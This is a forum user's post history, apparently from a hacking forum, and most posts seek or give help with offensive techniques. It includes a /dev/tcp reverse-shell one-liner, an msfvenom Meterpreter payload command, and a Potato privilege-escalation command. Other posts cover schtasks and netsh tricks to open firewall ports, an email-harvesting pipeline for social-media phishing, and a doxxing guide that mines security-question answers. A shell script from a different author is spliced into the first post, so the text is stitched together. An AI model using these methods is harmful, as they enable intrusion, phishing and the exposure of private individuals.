
vailixi
Active Members
Posts: 377
Joined
Last visited
Days Won: 3

Everything posted by vailixi

  1. I thought this might be a good topic for discussion. I had wondered how hard it would be to add a bunch of people I didn't know on Facebook or LinkedIn. I had noticed when I signed up for some social media sites that there is an option to import contacts from your email contact list. While it's illegal to send spam emails, I don't think it's illegal to use the email addresses to add friends on Facebook. So basically, if you wanted to find a bunch of people from a company or a school on LinkedIn or Facebook, you could pretty much use a method like this in social engineering or phishing on social media. Once again, I'm not totally sure on the legality of doing this, but I figure it is worth a discussion.

     Steps:

     Get the email list. I figured a guy could pretty much hit up Pastebin and create an email list for any organization he wanted to target. Grep out the email addresses and sort them for uniqueness. Also sort out domain names or domain extensions you don't want, like .gov or .mil addresses. You probably wouldn't want to accidentally spam or phish them.

     Split the lists into sections smaller than the maximum allowed limit. I think for Gmail it's 3000 or 5000. Forgot it. Split them into 2500-line text files.

     Then convert the text file into CSV with a program kind of like this. I wrote this pretty hastily. It just opens up a file and writes a CSV header with the correct format for Gmail. Make sure to get the number of commas right. You can do this with Yahoo! and other free email services. There are some security measures against it.

     Then import the email list into your contacts as a CSV. Then add friends on social media sites from your contact list. That simple.

     Here's a link to the blog post I wrote about it. http://codeexamplescplusplus.blogspot.com/2016/10/csv-maker-c.html

     Here's some hasty C++ for the CSV maker. My code is shit, just to let you know in advance.

     // Application to sort email addresses and put them into a CSV for use with Gmail.
     #include <fstream>
     #include <iostream>
     #include <string>

     using namespace std;

     int main(int argc, char* argv[])
     {
         // Input list (one address per line) and output CSV. The original
         // hard-coded paths are kept as defaults; both can be overridden on
         // the command line: csvmaker [input.txt] [output.csv]
         const char* inPath  = argc > 1 ? argv[1] : "/root/file.txt";
         const char* outPath = argc > 2 ? argv[2] : "/root/Desktop/emails.csv";

         ifstream infile(inPath);
         if (!infile.is_open()) {
             cout << "Unable to open file " << inPath << endl;
             return 1;
         }

         ofstream myfile(outPath);
         if (!myfile.is_open()) {
             cout << "Unable to open file " << outPath << endl;
             return 1;
         }

         // Layout information for the CSV file: Gmail's contact export header.
         myfile << "Name,Given Name,Additional Name,Family Name,Yomi Name,Given Name Yomi,"
                   "Additional Name Yomi,Family Name Yomi,Name Prefix,Name Suffix,Initials,"
                   "Nickname,Short Name,Maiden Name,Birthday,Gender,Location,Billing Information,"
                   "Directory Server,Mileage,Occupation,Hobby,Sensitivity,Priority,Subject,Notes,"
                   "Group Membership,E-mail 1 - Type,E-mail 1 - Value,E-mail 2 - Type,E-mail 2 - Value"
                << endl;

         // Output contacts to the contact list. Commas delimit the contact
         // information fields; the run of blank fields lines the address up
         // with the E-mail 1 columns, with "* " as the e-mail type.
         string line;
         while (getline(infile, line))
             myfile << ",,,,,,,,,,,,,,,,,,,,,,,,,,,* ," << line << ",," << endl;

         return 0;
     }
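The list-building steps described in the post (grep the addresses out of pasted text, sort for uniqueness, drop .gov/.mil domains, split into chunks, convert each chunk to Gmail's CSV layout) as one POSIX shell script. This is an added example, not the poster's code: the sample paste text, the file paths and the chunk size are constructed for illustration, and the only thing taken from the post is the Gmail header used by the C++ program above.

```shell
#!/bin/sh
# Added example (not the original poster's code): the whole pipeline from
# the post in one script. Sample input, paths and chunk size are constructed.

# Gmail contact-import header, copied from the C++ program in the post.
GMAIL_HEADER='Name,Given Name,Additional Name,Family Name,Yomi Name,Given Name Yomi,Additional Name Yomi,Family Name Yomi,Name Prefix,Name Suffix,Initials,Nickname,Short Name,Maiden Name,Birthday,Gender,Location,Billing Information,Directory Server,Mileage,Occupation,Hobby,Sensitivity,Priority,Subject,Notes,Group Membership,E-mail 1 - Type,E-mail 1 - Value,E-mail 2 - Type,E-mail 2 - Value'

# Constructed sample of pasted text; none of these addresses are real.
SAMPLE_PASTE='Leaked list (constructed sample):
alice@example.com, Bob.Smith@Example.com
contact: carol@example.org
admin@agency.example.gov  sgt@base.example.mil
alice@example.com again
noise: not-an-email@ localhost'

# extract_emails FILE...: pull addresses out of free text, lower-case them,
# drop the .gov/.mil domains the post says to leave alone, and dedupe.
# The regex is a pragmatic pattern, not an RFC 5322 validator.
extract_emails() {
    grep -Eoh '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}' "$@" \
        | tr 'A-Z' 'a-z' \
        | grep -Ev '\.(gov|mil)$' \
        | sort -u
}

# to_gmail_csv: stdin = one address per line, stdout = Gmail import CSV.
# The header has 31 fields; each row gets 27 empty fields, "* " as
# "E-mail 1 - Type", the address as "E-mail 1 - Value" and two empty
# "E-mail 2" fields, so every row also has 31 fields.
to_gmail_csv() {
    printf '%s\n' "$GMAIL_HEADER"
    awk 'NF { for (i = 0; i < 27; i++) printf ","; printf "* ,%s,,\n", $0 }'
}

# build_lists INFILE OUTDIR [CHUNK]: split the unique addresses into
# CHUNK-line pieces (2500 in the post) and write one CSV per piece to OUTDIR.
build_lists() {
    infile=$1; outdir=$2; chunk=${3:-2500}
    mkdir -p "$outdir"
    extract_emails "$infile" | split -l "$chunk" - "$outdir/emails-"
    for part in "$outdir"/emails-*; do
        [ -f "$part" ] || continue
        case $part in *.csv) continue ;; esac
        to_gmail_csv < "$part" > "$part.csv"
        rm -f "$part"
    done
}

# Usage: sh make_lists.sh paste.txt outdir [chunk]
# With no arguments, run on the constructed sample in a temporary directory.
if [ "$#" -ge 2 ]; then
    build_lists "$@"
else
    demo=$(mktemp -d)
    printf '%s\n' "$SAMPLE_PASTE" > "$demo/paste.txt"
    build_lists "$demo/paste.txt" "$demo/out" 2
    ls "$demo/out"
fi
```

Each output file carries the full header, so any one of them can be imported on its own; the field count of every row is checked against the header rather than by counting commas by hand, which is the mistake the post warns about.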
  2. Not totally sure what I'm doing. I started a reverse shell on my Ubuntu machine: 0<&96-;exec 96<>/dev/tcp/192.168.1.4/2222;sh <&96 >&96 2>&96 I get a file descriptor error when I run the command, but it opens a shell and I can interact with the target system (Ubuntu 16.04 Desktop). When I use cron_persistence from Armitage it seems to work fine. When I reboot the target it just black screens and never runs the desktop. It's funny. I had been hacked running Ubuntu about a week ago, but I figured that the attacker had intentionally PDOSed my system. It was probably accidental. Anybody have any idea what's going on here? What am I doing wrong with the shell, and what do I do to fix the issue on the target machine?
  3. Before I get into this too much I'm going to say a few words on ethics. Bullying sometimes serves as a catalyst for positive social change. From an anthropological perspective, bullying is a way more primitive people assert their place in the dominance hierarchy. Yes, in this day and age it would be nice if people were beyond the need for this, but really we aren't. People, I think, are a little too thin-skinned and will report people for just about any arbitrary reason. Not cool if you have a business that depends partially on social media as a marketing platform. That all being said, I learned d0xxing when I was an activist. I later applied that to skiptracing gigs and other legitimate investigations.

     Open Notepad. Copy and paste everything from their social media profile. Start looking up usernames on sites like Pipl. If you get hits on the usernames, look through those profiles and check the personal information for matches. For example, if the person's age is about 30, profiles will pop up with an age of 60, and those aren't good results. Make a logic chart and start narrowing down the results until you have a few suspects. You'll be amazed how many people use the same username or display name for multiple accounts. Sometimes they will have a Twitter that has the same username as the account in question, and the Twitter account will have their real name. You can look them up on sites like LinkedIn and pretty much know everything about them. You can get grids on their workplace. If you get an email address that is a work email, do a whois search on the domain name. If it comes up with domain privacy, don't just stop looking. Try to whois the nameservers; sometimes people will be pretty stealthy with their domain privacy, but then the hosting company is one of their buddies and you can just look them up. Sometimes the person will be friends with the webmaster on sites like Facebook and you can learn more about them.

     So if you've gone the d0xxing route, you have some personal information on the person. A lot of times you can find information like hometown, mother's maiden name, etc. Sometimes those are used as security questions for password resets and things like that. Keep in mind that illegal hacking could land you in prison. Also, if you want to present evidence to an employer or authorities, it should be evidence that you came upon legally. Also bear in mind the impact releasing the person's information may have on them professionally or personally, and weigh whether or not it is a proportional response to what they were doing. In other words, don't make it your personal mission to wreck someone's because you are butthurt about something somebody said on Tinychat; weigh the impact. Also, on the record, I adore internet sh*@lords. They make me laugh. I don't take kindly to it when someone PDOSes my machine because I said something that doesn't go along with whatever narrative they are pushing.
  4. I installed Kali on my new laptop. There's an issue when it boots. Everything works fine except that when it boots, Kali doesn't find a display to use. I think it's an issue where by default the system uses both displays (the regular laptop screen and the HDMI output). In some cases you can fix issues like this in the BIOS by setting the default display device. My BIOS doesn't have that option. So what I think is going on is that since there isn't a display set, Kali doesn't know which of the two to use and it just black screens. I think that's the issue. Not totally sure though. It sounds legit though. KEK. If I boot into recovery mode I get a shell. Can I fix the issue from there? Is there a boot parameter I can feed it for the display? Is there a config I can edit? Can I edit the config file and then live-build the thing so it works without hassle? What's the best way to fix something like this?
  5. I was going to install Kali Linux on a laptop that I picked up. It's UEFI Secure Boot. I found some forum posts about this from 2013, but it is a post with an unclear tutorial and then all of the responses are people saying it didn't work and asking questions. Have any of you guys done this lately? Is there a script for this or a well-worded tutorial? This sounds stupid, but EFI isn't really something I've had to deal with. My old Dell didn't have it. Then I got a Toshiba. It doesn't have it either. There's just a Secure Boot option you turn off in the BIOS and then you can install whatever you want on it. Then I picked up another Dell because it was on sale. I'm not sure of the whole process and I don't really have time to trial and error until I get it right. Does anyone have a script? I know how to copy the ISO to the flash drive and make a regular installer. As far as I know it's just adding a few files and directories. Not sure what else to put on the flash drive or where it goes. Anybody?
  6. I was messing around with splitting down a wordlist and I must have cut it just right to where my computer reads it as a music file instead of text. I don't know much about how computers handle music files, and my only thought is that some of the text is being read by the file system and tells Linux that the file is a music file. Nautilus shows the Rhythmbox icon instead of the text icon. If I rename the file from xaaaaabcc to xaaaaabcc.txt it will show up as a text file. It is actually a text file. https://drive.google.com/open?id=0B8Mz8bu8fJ4kclk1M0ZYQnRDcHM Anyone want to look at this file and tell me what I did?
  7. I'm trying to load some data into a database. But I really don't use MySQL so much. It's been long enough that I pretty much forgot what to do. What I want to do is load a text or XML document into a database. But when I load the document into the database, I get a bunch of null entries, which really doesn't do me any good. What I really need is a cheat sheet. Any good MySQL short documentation on this?
  8. Makes sense. I just want to sell some ad space to help pay for hosting.
  9. Short answer: You can pipe crunch into aircrack-ng, but crunch is a little faster than aircrack and it will create a temp file where the words go before being fed into aircrack, and eventually it will eat up all of your RAM and swap. You can also pipe JTR into aircrack. Something with FPGA support is what you want if you are bruting 12 characters. Otherwise you will never have the keys per second to make it worthwhile. If you want to spend a ton of money on specialized hardware, Pico Computing has something for you. If you look up password cracking or hash cracking sites you will see that people make wordlists. Sometimes they are shorter lists with large rule sets and some are just really big lists. They might be common dictionary words, phone numbers, hashes, account numbers, or any other combination of characters. A dictionary attack would be better than brute force. But brute forcing the password should be your last resort, after attempting a WPS PIN search or, if you're lucky, a Pixie Dust attack. Possibly use social engineering to get the password, or exploit a machine that connects to it regularly. Possibly something you can gain physical access to with ease, like a laptop left unattended in the cafeteria while the user is in the restroom.
  10. I mostly see Hak5 items for sale. Is it OK to offer non-Hak5 items for sale in this section?
  11. What are you reading right now? What's on your reading list? Hacking and security related or not, doesn't matter.
  12. I was a little curious about the PrependMigrate option for Meterpreter. I was trying to migrate to iexplore.exe or MicrosoftEdge.exe. But I'm not sure how to set the PrependMigrateProc option when generating my payload. I'm mostly confused on the path for the program I want to migrate to. If I use the program name it just doesn't work. When I use the full path it throws a different error, like my syntax is wrong. Any ideas? msfvenom -p windows/meterpreter/reverse_hop_http -e x86/shikata_ga_nai -i 3 PrependMigrate true PrependMigrateProc "C:\Program Files\Internet Explorer\iexplore.exe" --platform win HOPURL=http://192.168.1.10/hop.php EXTENSIONS=stdapi,priv -f raw -o /root/Desktop/radpayload.raw
  13. Sorry, I'm pretty much trying to find new ways to actually get my payload to bypass the firewall and make a reverse connection reliably. I was using a reverse hop HTTP Meterpreter and it seemed to work for a while.
  14. Incidentally, I found this WPAD spoofing attack that seems to work rather well: Potato attack (Potato source code on GitHub). Syntax was something like this: Potato.exe -ip 192.168.1.9 -disable_exhaust true cmd "C:\\windows\\system32\\cmd.exe /k net localgroup administrator me add" This actually worked for adding my user to the administrators group. That's cool and all. I still don't have the password to run netsh and open a port on the firewall, though. Is there a way to just kill the firewall?
  15. survival

      Build waterproof enclosures for your computers if it is cost effective. Pelican makes some really nice waterproof cases. Then you'll also probably have to have some kind of cooling system other than air. But I can see most of the system being completely waterproofed. Maybe not the power supply. You'll want to be able to shut everything down. You can probably do this with some kind of switch like fish tanks have. It's basically two electrical leads that are close enough together that when the water level is up enough (or down far enough, in some cases) the liquid will close the circuit, or in some cases break the circuit, depending on how you are doing things. Like a water level alarm. Maybe make something like that to shut things off. But really, if you can afford a bunch of this stuff, get a room on the top floor instead.
  16. I have read some on encryption. Lattice-based encryption is something you may be interested in reading about. SSL and VPNs are secure against less sophisticated attackers who have limited resources, but state-sponsored actors can probably crack them with ease at this point.
  17. OK, ok, that makes sense. LOL. I tried this: schtasks /Create /S %computername% /RU desktop/8alleale\me /RP password /SC ONCE /TN dirshow /TR dir /ST 13:30 Now I'm at least getting access denied instead of a syntax error. I tried this as well: schtasks /Create /S %computername% /RU %username% /RP password /SC ONCE /TN dirshow /TR dir /ST 13:30 Same this way: access denied. Is there something wrong with the way I'm getting the system and username?
  18. I don't get that. Am I piping the password into dir somehow?
  19. I bought one of those. I got so frustrated with the thing I took it out and shot it. True story.
  20. Or maybe something like this: I keep getting syntax errors. I think I need escape characters, but I'm not really sure how to write out this command. schtasks /Create /S %computername% /RU %username% /RP password /SC ONCE /TN portopen /TR "netsh advfirewall firewall add rule name=Open Port 9999 dir=in action=allow protocol=TCP localport=9999 /ST 18:44"
  21. Is the port 4444 open on target system's firewall?
  22. Digininja, any chance you can help me with syntax on this? I think I'm going to just go ahead and brute a scheduled task that will open a port on the firewall. I'm not sure on the syntax for schtasks and netsh advfirewall. Here's what I was trying for, but my syntax is horribly wrong. Not really sure on the options. schtasks /Create /S %computername% /U %username% /P password /TN portopen /SC %time% /tr netsh advfirewall firewall add rule name="Open Port 9999" dir=in action=allow protocol=TCP localport=9999
  23. So I wanted to make a payload which can be run without admin privileges and brute force the admin password by calling some program with system() that would require a password, until the password is found. My question is: what is the fastest command you can run from the Windows command line that will actually require an administrator password? Also, how do I get an error message back for conditional logic that will tell me if I got the right password? Any ideas?
  24. What you are saying is valid. Doing away with the machines altogether would be great.